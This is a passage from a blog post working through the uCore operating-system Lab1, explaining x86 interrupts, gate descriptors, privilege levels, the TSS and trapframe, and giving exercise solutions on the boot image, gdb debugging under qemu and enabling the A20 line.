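(IDTR).</li></ul><h4 id="b-IDT-gate-descriptors">b. 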
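IDT gate descriptors</h4><ul><li><p>Interrupts and exceptions should be handled through an <code>Interrupt Gate</code> or a <code>Trap Gate</code>. The only difference is that when control passes through an <code>Interrupt Gate</code>, the CPU automatically disables interrupts, whereas through a <code>Trap Gate</code> the CPU neither disables nor enables interrupts and leaves the state as it was.</p><blockquote><p>The reason is that when the CPU transfers control through an <code>Interrupt Gate</code>, it clears the IF bit in eflags, while a <code>Trap Gate</code> leaves IF unchanged.</p></blockquote></li><li><p>The IDT can contain three kinds of descriptors</p><ul><li>Task-gate descriptor</li><li>Interrupt-gate descriptor (used for interrupts)</li><li>Trap-gate descriptor (used for system calls)<br>The figure below shows the formats of the 80386 interrupt-gate and trap-gate descriptors:<br><img src="/2020/08/uCore-1/gate.png" alt="img"></li></ul></li></ul><h4 id="c-中断处理过程">c. Interrupt Handling Process</h4><h5 id="1-起始阶段">1) Entry Phase</h5><ul><li>After executing each instruction, the CPU checks whether the interrupt controller has raised an interrupt. If so, it fetches the corresponding interrupt vector.</li><li>Using the interrupt vector, the CPU looks up the corresponding gate descriptor in the IDT.</li><li>Using the segment selector in that gate descriptor, the CPU fetches the corresponding segment descriptor from the GDT. It now has the segment base and attributes of the interrupt service routine, which is where it will jump.</li><li>The CPU compares the CPL with the DPL in the service routine's segment descriptor to determine whether a privilege-level change occurs. If it does, the CPU reads the kernel stack address, i.e. the kernel-mode ss and esp, from the current program's TSS (whose starting address in memory is held in the TR register) and immediately switches to this new kernel stack. This is the stack the interrupt service routine will use. The CPU then pushes the interrupted program's user-mode ss and esp onto the new kernel stack.</li><li>The CPU then <strong>saves the context of the interrupted program</strong> (the values of certain registers) so that the program can be resumed later. It uses the kernel stack for this, pushing in order the interrupted program's eflags, cs, eip, and errorCode (for exceptions that have an error code).</li><li>Finally, the CPU loads the address of the service routine's first instruction into cs and eip and <strong>begins executing the interrupt service routine</strong>. The previous program is now suspended and the service routine is running.</li></ul><h5 id="2-终止阶段">2) Exit Phase</h5><ul><li>Once all of its work is done, each interrupt service routine resumes the interrupted program with the <code>iret</code> (or <code>iretd</code>) instruction. The CPU executes IRET as follows:<ul><li>It first pops the saved context of the interrupted program, i.e. eip, cs, and eflags, from the kernel stack, and execution resumes from there.</li><li>If a privilege-level change is involved (returning from kernel mode to user mode), it also pops the user-mode ss and esp from the kernel stack, which switches back to the original user stack.</li><li>If the event was an exception with an error code (errorCode), the CPU does not pop the errorCode when restoring the context. The interrupt service routine must pop the errorCode itself before executing iret.</li></ul></li></ul><h3 id="10-特权级">10. 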
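Privilege Levels</h3><blockquote><p>Privilege levels are covered in the Lab2 course material, but since the Challenge in Lab1 involves changing the privilege level, that content has been moved here.</p></blockquote><ul><li>There are four privilege levels, numbered 0 to 3. The <code>Kernel</code> runs at level 0 (ring 0), user programs run at level 3 (ring 3), and operating system services occupy levels 1 and 2.</li><li>How the privilege levels differ<ul><li>Some instructions (for example the privileged instruction <code>lgdt</code>) can only run in ring 0.</li><li>The CPU checks the privilege level at the following moments<ul><li>Accessing a data segment</li><li>Accessing a page</li><li>Entering an interrupt service routine (ISR)</li><li>…</li></ul></li><li>If the check fails, the CPU raises a <strong>General Protection Fault</strong>.</li></ul></li></ul><h4 id="1-CPL、DPL、RPL与IOPL">1. CPL, DPL, RPL and IOPL</h4><ul><li><p><strong>The DPL is stored in the segment descriptor</strong> and specifies the <strong>privilege level required to access that segment</strong> (Descriptor Privilege Level). Each segment has a fixed DPL.<br>A privilege check is performed whenever a process accesses a segment.</p></li><li><p>The <strong>CPL</strong> is held in the low two bits of the CS register. <strong>In other words, the CPL is the DPL of the CS segment descriptor</strong>, and it is the privilege level of the code currently running (Current Privilege Level).</p></li><li><p><strong>The RPL is stored in the segment selector</strong> and states the <strong>privilege level a process requests for a segment access</strong> (Request Privilege Level). It belongs to the <strong>segment selector</strong>: every selector carries its own RPL. The RPL is not fixed per segment, so two accesses to the same segment may use different RPLs. The RPL can weaken the CPL. For example, if a process with CPL=0 accesses a data segment through a selector whose RPL is 3, then despite its CPL of 0 it has only privilege-3 access to that segment.</p></li><li><p>The IOPL (I/O Privilege Level) is the I/O privilege flag, also called the I/O privilege level field. It lives in the <strong>eflags register</strong> and is two bits wide. It specifies the privilege level required to execute I/O instructions: if the current privilege level is numerically less than or equal to the IOPL, the I/O instruction may execute; otherwise a protection exception is raised.</p><blockquote><p>The IOPL can be changed only when CPL=0, and the IF flag can be changed only when CPL&lt;=IOPL.</p></blockquote></li></ul><h4 id="2-特权级检查">2. Privilege Checks</h4><blockquote><p>In the comparisons below, keep in mind that a lower privilege corresponds to a larger ring value.</p></blockquote><ul><li><p>When accessing a gate (interrupt, trap, exception), the requirement is <strong>DPL[segment] &lt;= CPL &lt;= DPL[gate]</strong></p><blockquote><p>The code accessing the gate must be <strong>at least as privileged as the gate</strong>, otherwise it cannot use the gate.</p><p>But the code accessing the gate must be <strong>no more privileged than the target segment</strong>, because the purpose of a gate is to <strong>reach a more privileged segment</strong>. This is how a <strong>low-privilege application uses high-privilege kernel services</strong>.</p></blockquote></li><li><p>When accessing a segment, the requirement is <strong>DPL[segment] &gt;= max {CPL, RPL}</strong></p><blockquote><p>Segment data is always accessed with the less privileged of the two levels.</p></blockquote></li></ul><h4 id="3-通过中断切换特权级">3. 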
Switching Privilege Levels via Interrupts</h4><h5 id="1-TSS">1) TSS</h5><ul><li><p>The <strong>TSS (Task State Segment)</strong> is the segment in which the operating system saves a process's context during a process switch. Its layout is shown below<br><img src="/2020/08/uCore-1/tss.png" alt="img"></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* task state segment format (as described by the Pentium architecture book) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">taskstate</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span> ts_link;        <span class="comment">// old ts selector</span></span><br><span class="line">    <span class="type">uintptr_t</span> ts_esp0;   
     <span class="comment">// stack pointers and segment selectors</span></span><br><span class="line">    <span class="type">uint16_t</span> ts_ss0;        <span class="comment">// after an increase in privilege level</span></span><br><span class="line">    <span class="type">uint16_t</span> ts_padding1;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_esp1;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ss1;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding2;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_esp2;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ss2;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding3;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_cr3;        <span class="comment">// page directory base</span></span><br><span class="line">    <span class="type">uintptr_t</span> ts_eip;        <span class="comment">// saved state from last task switch</span></span><br><span class="line">    <span class="type">uint32_t</span> ts_eflags;</span><br><span class="line">    <span class="type">uint32_t</span> ts_eax;        <span class="comment">// more saved state (registers)</span></span><br><span class="line">    <span class="type">uint32_t</span> ts_ecx;</span><br><span class="line">    <span class="type">uint32_t</span> ts_edx;</span><br><span class="line">    <span class="type">uint32_t</span> ts_ebx;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_esp;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_ebp;</span><br><span class="line">    <span class="type">uint32_t</span> ts_esi;</span><br><span class="line">    <span class="type">uint32_t</span> ts_edi;</span><br><span class="line">    <span class="type">uint16_t</span> ts_es;            <span class="comment">// even more saved state (segment selectors)</span></span><br><span 
class="line">    <span class="type">uint16_t</span> ts_padding4;</span><br><span class="line">    <span class="type">uint16_t</span> ts_cs;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding5;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ss;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding6;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ds;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding7;</span><br><span class="line">    <span class="type">uint16_t</span> ts_fs;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding8;</span><br><span class="line">    <span class="type">uint16_t</span> ts_gs;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding9;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ldt;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding10;</span><br><span class="line">    <span class="type">uint16_t</span> <span class="type">ts_t</span>;            <span class="comment">// trap on task switch</span></span><br><span class="line">    <span class="type">uint16_t</span> ts_iomb;        <span class="comment">// i/o map base address</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><ul><li><p>Only the fields <strong>related to privilege switching</strong> are discussed here. The TSS keeps a separate stack (the <code>ss</code> and <code>esp</code> register values) for each of ring0, ring1, and ring2. When a user program moves from ring3 to ring0 (for example by raising an interrupt), the stack is switched from the user stack to the kernel stack. The switch is already complete at the instant the interrupt begins (for example, between <code>int 0x78</code> and the first instruction of the handler).</p><blockquote><p>Switching the stack means changing the <code>esp</code> and <code>ss</code> registers.</p></blockquote></li><li><p>The segment descriptor of the TSS is stored in the GDT, and its <code>ring0</code> stack is set up together with the GDT during initialization. The <code>TR</code> register holds the selector of the current TSS, with the descriptor cached alongside it, so that the TSS can be located quickly.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">segdesc</span> gdt[] = &#123;</span><br><span class="line">    SEG_NULL,</span><br><span class="line">    [SEG_KTEXT] = <span class="built_in">SEG</span>(STA_X | STA_R, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_KERNEL),</span><br><span class="line">    [SEG_KDATA] = <span class="built_in">SEG</span>(STA_W, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_KERNEL),</span><br><span class="line">    [SEG_UTEXT] = <span class="built_in">SEG</span>(STA_X | STA_R, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_USER),</span><br><span class="line">    [SEG_UDATA] = <span class="built_in">SEG</span>(STA_W, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_USER),</span><br><span class="line">    [SEG_TSS]   = SEG_NULL,</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">pseudodesc</span> gdt_pd = &#123;</span><br><span class="line">      <span 
class="built_in">sizeof</span>(gdt) - <span class="number">1</span>, (<span class="type">uintptr_t</span>)gdt</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* gdt_init - initialize the default GDT and TSS */</span></span><br><span class="line">  <span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function">  <span class="title">gdt_init</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Set the ring0 stack address in the TSS: the esp value and the SS segment selector</span></span><br><span class="line">      <span class="built_in">load_esp0</span>((<span class="type">uintptr_t</span>)bootstacktop);</span><br><span class="line">      ts.ts_ss0 = KERNEL_DS;</span><br><span class="line"></span><br><span class="line">      <span class="comment">// Write the TSS descriptor into the GDT</span></span><br><span class="line">      gdt[SEG_TSS] = <span class="built_in">SEGTSS</span>(STS_T32A, (<span class="type">uintptr_t</span>)&amp;ts, <span class="built_in">sizeof</span>(ts), DPL_KERNEL);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// Load the GDT into the GDTR register</span></span><br><span class="line">      <span class="built_in">lgdt</span>(&amp;gdt_pd);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// Load the TSS selector into the TR register</span></span><br><span class="line">      <span class="built_in">ltr</span>(GD_TSS);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><h5 id="2-trapFrame">2) trapFrame</h5><ul><li><p>The <code>trapframe</code> structure is the stack layout required when entering through an interrupt gate. It is defined as follows</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">trapframe</span> &#123;</span><br><span class="line">    <span class="comment">// tf_regs holds the general-purpose registers, including eax, ebx, esi, edi and so on</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pushregs</span> tf_regs;</span><br><span class="line">    <span class="type">uint16_t</span> tf_gs;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding0;</span><br><span class="line">    <span class="type">uint16_t</span> tf_fs;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding1;</span><br><span class="line">    <span class="type">uint16_t</span> tf_es;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding2;</span><br><span class="line">    <span class="type">uint16_t</span> tf_ds;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding3;</span><br><span class="line">    <span class="type">uint32_t</span> tf_trapno;</span><br><span class="line">    <span class="comment">// The fields below are pushed by the CPU hardware onto the stack in use after the switch, including the esp and ss used for privilege switching (tf_err comes from the CPU only for exceptions that have an error code)</span></span><br><span class="line">    <span class="type">uint32_t</span> tf_err;</span><br><span class="line">    <span class="type">uintptr_t</span> tf_eip;</span><br><span class="line">    <span class="type">uint16_t</span> tf_cs;</span><br><span class="line">    <span 
class="type">uint16_t</span> tf_padding4;</span><br><span class="line">    <span class="type">uint32_t</span> tf_eflags;</span><br><span class="line">    <span class="comment">// The fields below are used only when the privilege level changes</span></span><br><span class="line">    <span class="type">uintptr_t</span> tf_esp;</span><br><span class="line">    <span class="type">uint16_t</span> tf_ss;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding5;</span><br><span class="line">&#125; __attribute__((packed));</span><br></pre></td></tr></table></figure></li></ul><h5 id="3-中断处理例程的入口代码">3) Entry Code of the Interrupt Handler</h5><ul><li><p>The entry code of the interrupt handler saves the context and builds a <code>trapframe</code>. Its source is as follows:</p>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span 
class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">  #include &lt;memlayout<span class="number">.</span>h&gt;</span><br><span class="line"></span><br><span class="line"># vectors<span class="number">.</span>S sends all traps here.</span><br><span class="line"><span class="meta">.text</span></span><br><span class="line"><span class="meta">.globl</span> __alltraps</span><br><span class="line"><span class="symbol">__alltraps:</span></span><br><span class="line">    # <span class="keyword">push</span> registers to build a trap frame</span><br><span class="line">    # therefore make the stack look like a struct trapframe</span><br><span class="line">    pushl %ds</span><br><span class="line">    pushl %es</span><br><span class="line">    pushl %fs</span><br><span class="line">    pushl %gs</span><br><span class="line">    pushal</span><br><span class="line"></span><br><span class="line">    # load GD_KDATA <span class="keyword">into</span> %ds <span class="keyword">and</span> %es to set <span class="meta">up</span> data segments for kernel</span><br><span class="line">    movl $GD_KDATA, %eax</span><br><span class="line">    movw %ax, %ds</span><br><span class="line">    movw %ax, %es</span><br><span class="line"></span><br><span class="line">    # <span class="keyword">push</span> %esp to pass a pointer to the trapframe as an argument to trap()</span><br><span class="line">    pushl %esp</span><br><span class="line">    # <span class="keyword">call</span> trap(tf), where tf=%esp</span><br><span class="line">    <span class="keyword">call</span> trap</span><br><span class="line">    # <span class="keyword">pop</span> the pushed stack pointer</span><br><span class="line">    popl %esp</span><br><span class="line"></span><br><span class="line">    # return falls through to trapret...</span><br><span class="line"><span class="meta">.globl</span> __trapret</span><br><span class="line"><span 
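class="symbol">__trapret:</span></span><br><span class="line">    # restore registers from stack</span><br><span class="line">    popal</span><br><span class="line"></span><br><span class="line">    # restore %ds, %es, %fs <span class="keyword">and</span> %gs</span><br><span class="line">    popl %gs</span><br><span class="line">    popl %fs</span><br><span class="line">    popl %es</span><br><span class="line">    popl %ds</span><br><span class="line"></span><br><span class="line">    # get rid of the trap number <span class="keyword">and</span> error code</span><br><span class="line">    addl <span class="number">$0</span>x8, %esp</span><br><span class="line">    <span class="keyword">iret</span></span><br></pre></td></tr></table></figure></li></ul><h5 id="4-切换特权级的过程">4) The Privilege Switching Process</h5><h6 id="a-特权级提升">a. Privilege Escalation</h6><p>When switching <strong>from ring3 to ring0 (privilege escalation)</strong> through a trap gate:</p><ul><li><p>At the instant of the trap, because the privilege level changes, the CPU consults the TSS, switches <code>ss</code> and <code>esp</code> to the kernel stack, and <strong>automatically, in this order,</strong> pushes <code>user_ss</code>, <code>user_esp</code>, <code>user_eflags</code>, <code>user_cs</code>, <code>old_eip</code>, and <code>err</code>.</p><blockquote><p>Note that the CPU switches to the kernel stack first, so <code>esp</code> and <code>ss</code> no longer point at the user stack, yet the CPU can still store the user stack address on the kernel stack. The hardware takes care of this by holding the old values during the switch.</p></blockquote><blockquote><p>If the vector has no err, the CPU pushes nothing in its place; the entry stub in <code>vectors.S</code> pushes a 0 instead so that the stack layout stays uniform.</p></blockquote></li><li><p>Next, at the handler entry point, the remaining segment registers and all general-purpose registers are pushed, which completes a <code>trapframe</code>. That <code>trapframe</code> is then passed to the real interrupt handler, which runs.</p></li><li><p>The handler checks the trap number passed in (<code>trapno</code>) and runs the matching code. In the <strong>privilege escalation code</strong>, the program edits the <code>CS, DS, eflags</code> values in the <code>trapframe</code> it received, changing the <strong>DPL, CPL, and IOPL</strong> they carry to achieve the escalation.</p></li><li><p>It then <strong>copies the modified <code>trapframe</code> onto the user stack</strong> (this step does not change the <code>user_esp</code> register) and sets the value that will be popped into <code>esp</code> when the handler finishes to the <strong>new address on the user stack</strong> (unlike the previous step, this does change the <code>user_esp</code> that is <strong>about to be restored</strong>).</p><blockquote><p>Note that this user stack address now points at the modified <code>trapframe</code>.</p></blockquote><p>This way, when the handler exits and the context is about to be restored, the first value popped is the stack pointer, which is now the modified user stack address, and the general-purpose registers, segment registers, and so on that are popped afterwards all come from the <code>trapframe</code> stored on the user stack.</p><blockquote><p>Why such an odd procedure? Because <strong>only one instruction, <code>pop %esp</code>,</strong> restores the <code>esp</code> register</p><p>(in this situation the <code>iret</code> instruction does not pop a stack address).</p><p>Normally, after the handler finishes and <code>esp</code> is restored, <code>esp</code> still points into the kernel stack.</p><p>But our goal is to switch back to the user stack, so the only option is to change the <code>esp</code> value that was going to be restored and let that instruction switch to the user stack.</p></blockquote><blockquote><p>Think about it: before entering the handler, the context is <strong>saved on the kernel stack</strong>, but the data used to restore the context is <strong>stored on the user stack</strong>.</p></blockquote></li><li><p>In the kernel, the step <code>copy the modified trapframe onto the user stack</code> must drop the two old <code>ss</code> and <code>esp</code> values at the end of the <code>trapframe</code>, because of how the <code>iret</code> instruction behaves:</p><ul><li><p>The <code>iret</code> instruction works as follows</p><blockquote><p><code>iret</code> pops <code>eip</code>, <code>cs</code>, and <code>eflags</code>, in that order, into the corresponding registers and then resumes execution at the new <code>cs:eip</code>. If the privilege level changes, it additionally pops <code>esp</code> and <code>ss</code> after <code>eflags</code>.</p></blockquote></li><li><p>Because the privilege level is the same before and after <code>iret</code> (<strong>[in handler] ring0 -&gt; ring0 [after handler]</strong>), <code>iret</code> does not pop <code>esp</code> and <code>ss</code>. If those two values were copied onto the user stack as well, <code>esp</code> would end up 8 bytes higher than the user stack address before the interrupt, which could cause serious errors.</p></li></ul></li></ul>
<h6 id="b-特权级降低">b. Privilege De-escalation</h6><p>Switching <strong>from ring0 to ring3 (privilege de-escalation)</strong> through a trap gate works much like privilege escalation, with a few differences to note</p><ul><li><p>Unlike an interrupt raised from ring3, when ring0 raises the interrupt the stack does not change between the point before the interrupt and the point after entering the handler.</p><blockquote><p>The code is already in ring0 before raising the interrupt, and the handler also runs in ring0, so the trap does not change the privilege level and there is no need to consult the TSS and reload the <code>ss</code> and <code>esp</code> registers.</p></blockquote></li><li><p>The modified <code>trapFrame</code> does not need to be copied to the stack that will be used afterwards, as it was above. Here the privilege level does change across <code>iret</code>, so the instruction pops <code>ss</code> and <code>esp</code>, and the return stack address can be set through <code>iret</code> itself.</p></li></ul><h2 id="练习解答">Exercise Solutions</h2><h3 id="1-练习1">1. 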
Exercise 1</h3><blockquote><p>Understand how make produces the executable files.</p></blockquote><ul><li>How is the operating system image ucore.img generated step by step? Run <code>make V=</code> and read the steps it prints. They show that<ul><li><p>make compiles all source files into object files and links them into the <code>kernel</code> and <code>bootblock</code> files.</p></li><li><p>The <code>dd</code> command copies the data of these two files into the img file, producing the image.</p><blockquote><p>Unlike <code>cp</code>, the <code>dd</code> command works at the level of raw disk data and is more low-level.</p></blockquote></li></ul></li><li>What characterizes a disk master boot sector that the system accepts as valid?<ul><li><p>Reading the source <code>lab1/tools/sign.c</code> shows that <strong>a valid MBR is 512 bytes long and its last two bytes are <code>0x55</code> and <code>0xAA</code></strong></p></li><li><p>Part of the source is shown below</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Read the file into memory</span></span><br><span class="line"><span class="comment">// ....</span></span><br><span class="line"><span class="comment">// Set the last two of the 512 bytes to the magic number</span></span><br><span class="line">buf[<span class="number">510</span>] = <span class="number">0x55</span>;</span><br><span class="line">buf[<span class="number">511</span>] = <span class="number">0xAA</span>;</span><br><span class="line"><span class="comment">// Write the in-memory data to a new file</span></span><br><span class="line"><span class="comment">// ....</span></span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="2-练习2">2. 
Exercise 2</h3><blockquote><p>Use qemu to run and debug the software in lab1.</p></blockquote><ul><li><p>Change <code>tools/gdbinit</code> to</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">file obj/bootblock.o</span><br><span class="line">set architecture i8086</span><br><span class="line">target remote :<span class="number">1234</span></span><br><span class="line">b* <span class="number">0x7c00</span></span><br><span class="line"></span><br><span class="line">define hook-stop</span><br><span class="line">x/i $eip</span><br><span class="line">end</span><br><span class="line"><span class="keyword">continue</span></span><br></pre></td></tr></table></figure><ul><li>In a gdb script, the commands inside <code>define hook-stop ... end</code> run automatically every time gdb stops. The <code>define .. end</code> block in the script above tells gdb to print the next instruction at every stop, which makes debugging easier.</li><li>To single-step through the BIOS, delete <code>continue</code>. gdb will then stop at <code>0xfff0</code>, and from there you can single-step freely.</li></ul></li><li><p>Then run <code>make debug</code>, which opens qemu together with a gdb session that is already connected to it.</p></li><li><p>One pitfall: when connecting to qemu remotely, <strong>it is best not to use the pwndbg plugin</strong>, because with it gdb becomes unusable once connected to qemu.</p><blockquote><p>The <code>peda</code> plugin works normally.</p></blockquote></li><li><p>One thing to watch for while debugging: for the first few BIOS instructions, the segment register value must be added by hand in GDB, otherwise the output is wrong. The reason is that the <code>cs</code> register is <strong>initially non-zero</strong>, while gdb by default disassembles at the address in <code>$ip</code> rather than at <code>cs:ip</code>.</p><ul><li><p>This is the wrong instruction output</p><p><img src="/2020/08/uCore-1/gdbwrong.png" alt="img"></p></li><li><p>This is the correct instruction output</p><p><img src="/2020/08/uCore-1/gdbgood.png" alt="img"></p></li></ul><blockquote><p>Finally, thanks to <a href="https://github.com/M-ouse">@2st</a> for the help with BIOS debugging.</p></blockquote></li></ul><h3 id="3-练习3">3. 
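Exercise 3</h3><blockquote><p>Analyze how the bootloader enters protected mode.</p></blockquote><ul><li><p>Why enable A20, and how is it enabled?</p><ul><li><p>Intel's early 8086 CPU had 20 address lines but only 16-bit registers, so it reached all of memory by computing <strong>(segment register value &lt;&lt; 4) + offset within the segment</strong>. The largest address this formula can produce is about 1088KB, which exceeds what 20 address lines can represent, so the address "wraps around" (somewhat like integer overflow). The next generation of machines, based on the Intel 80286 CPU, had 24 address lines, so an address above 1MB <strong>no longer wrapped around</strong>, and this <strong>broke backward compatibility</strong>. To stay fully backward compatible, IBM added hardware logic to its machines to imitate the old wrap-around behavior. That logic is the <strong>A20 Gate</strong>.</p></li><li><p>The A20 Gate ANDs the A20 address line with an output of the keyboard controller, which makes it possible to enable or disable the A20 address line. Initially the A20 line is disabled (always 0) until system software enables it through certain I/O operations. While the A20 line is disabled, programs behave as if running on an 8086 and addresses above 1MB are not accessible. In protected mode the A20 line must be enabled. Once it is enabled, memory addressing no longer wraps around.</p></li><li><p>In the current environment, the 8042 keyboard controller uses only two I/O ports, 0x60 and 0x64. Software uses these ports to send commands to the keyboard controller or the keyboard and to read status. The output port P2 serves special purposes: bit 0 (pin P20) implements CPU reset, and bit 1 (pin P21) controls whether the A20 line is enabled.<br><img src="/2020/08/uCore-1/8042Keyboard.png" alt="img"><br>The bit we need to change is bit 1 of the <strong>output port</strong>, one of the 8042's three internal ports. That port is written as follows:</p><blockquote><p>Writing the Output Port: send command 0xd1 to port 64h, then write the Output Port data to port 60h</p></blockquote></li></ul></li><li><p>The assembly code that enables A20 is as follows</p>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">    # Enable A20:</span><br><span class="line">    #  For backwards compatibility with the earliest PCs, physical</span><br><span class="line">    #  address line <span class="number">20</span> is tied low, so 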
that addresses higher than</span><br><span class="line">    #  1MB wrap around to <span class="meta">zero</span> by <span class="meta">default</span>. This code undoes this.</span><br><span class="line"><span class="symbol">seta20.1:</span></span><br><span class="line">    # Read port <span class="number">0x64</span> (the Status Register)</span><br><span class="line">    inb <span class="number">$0</span>x64, %al    # Wait for <span class="keyword">not</span> busy(<span class="number">8042</span> input buffer empty).</span><br><span class="line">    testb <span class="number">$0</span>x2, %al   # bit <span class="number">1</span> set means the input buffer is still full (busy)</span><br><span class="line">    <span class="keyword">jnz</span> seta20<span class="number">.1</span></span><br><span class="line"></span><br><span class="line">    movb <span class="number">$0</span>xd1, %al  # <span class="number">0xd1</span> -&gt; port <span class="number">0x64</span></span><br><span class="line">    outb %al, <span class="number">$0</span>x64  # <span class="number">0xd1</span> means: write data to <span class="number">8042</span><span class="string">&#x27;s P2 port</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">seta20.2:</span></span><br><span class="line"><span class="string">    inb $0x64, %al   # Wait for not busy(8042 input buffer empty).</span></span><br><span class="line"><span class="string">    testb $0x2, %al</span></span><br><span class="line"><span class="string">    jnz seta20.2</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    movb $0xdf, %al  # 0xdf -&gt; port 0x60</span></span><br><span class="line"><span class="string">    outb %al, $0x60  # 